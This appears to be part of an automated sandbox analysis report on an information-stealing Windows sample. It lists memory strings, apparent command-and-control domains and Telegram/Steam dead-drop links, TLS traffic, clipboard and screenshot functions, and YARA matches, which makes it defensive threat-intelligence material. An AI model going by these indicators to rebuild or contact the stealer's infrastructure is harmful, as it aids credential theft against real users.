Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000567000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.000000000044C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com/
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com/P_
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000567000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.000000000044C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.comntent-Disposition:
Source: Amcache.hve.33.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.1426312746.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943907695.000000002450D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.29.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/T
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/api
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/api.
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/api45
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/apip
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condedqpwqm.shop/apitK
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: https://mozilla.org0/
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
Source: IJKJJK.29.dr	String found in binary or memory: https://support.mozilla.org
Source: IJKJJK.29.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJKJJK.29.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/(
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/9
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/iyigunl
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/iyigunlsql.dllsqlr.dllIn
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.000000000044C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamelwt
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamelwt#cp
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamelwtkwnvfdhttps://steamcommunity.com/profiles/76561199761128941b
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/nLbZ
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: BAAEHD.29.dr, AECFCAAE.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/chost.exe
Source: GIJEGDAKEHJECAKEGDHJDHDAFH.3.dr, IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/YSAESCTrC.exe
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: GIJEGDAKEHJECAKEGDHJDHDAFH.3.dr, IJKJJK.29.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49740 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

24_2_00431530

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

24_2_00431530

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418AB0

System Summary

Malicious sample detected (through community Yara rule)

Source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 192000
Source: userFBKFCFBFID.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: userIEHDAFHDHC.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128
Source: DHCGHDHIDH.exe.29.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: HDAFIIDAKJ.exe.29.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CBAB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAB8C0 rand_s,NtQueryVirtualMemory,	3_2_6CBAB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6CBAB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB4F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CB4F280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA1B8C0 NtQueryVirtualMemory,	29_2_6CA1B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA1B910 NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlRestoreLastWin32Error,GetLastError,	29_2_6CA1B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CA1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlRestoreLastWin32Error,	29_2_6CA1B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9BF280 NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlRestoreLastWin32Error,	29_2_6C9BF280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01740B20	0_2_01740B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB435A0	3_2_6CB435A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBA34A0	3_2_6CBA34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAC4A0	3_2_6CBAC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB56C80	3_2_6CB56C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB86CF0	3_2_6CB86CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB4D4E0	3_2_6CB4D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB6D4D0	3_2_6CB6D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB564C0	3_2_6CB564C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBB542B	3_2_6CBB542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB85C10	3_2_6CB85C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB92C10	3_2_6CB92C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBBAC00	3_2_6CBBAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBB545C	3_2_6CBB545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB55440	3_2_6CB55440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBA85F0	3_2_6CBA85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB80DD0	3_2_6CB80DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB70512	3_2_6CB70512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB6ED10	3_2_6CB6ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB5FD00	3_2_6CB5FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBA4EA0	3_2_6CBA4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB65E90	3_2_6CB65E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBAE680	3_2_6CBAE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB4BEF0	3_2_6CB4BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB5FEF0	3_2_6CB5FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBB76E3	3_2_6CBB76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBA9E30	3_2_6CBA9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB87E10	3_2_6CB87E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB95600	3_2_6CB95600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB4C670	3_2_6CB4C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBB6E63	3_2_6CBB6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB69E50	3_2_6CB69E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB83E50	3_2_6CB83E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB64640	3_2_6CB64640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB92E4E	3_2_6CB92E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB977A0	3_2_6CB977A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB76FF0	3_2_6CB76FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB4DFE0	3_2_6CB4DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB87710	3_2_6CB87710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB59F00	3_2_6CB59F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB760A0	3_2_6CB760A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB6C0E0	3_2_6CB6C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB858E0	3_2_6CB858E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CBB50C7	3_2_6CBB50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB8B820	3_2_6CB8B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB94820	3_2_6CB94820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB57810	3_2_6CB57810
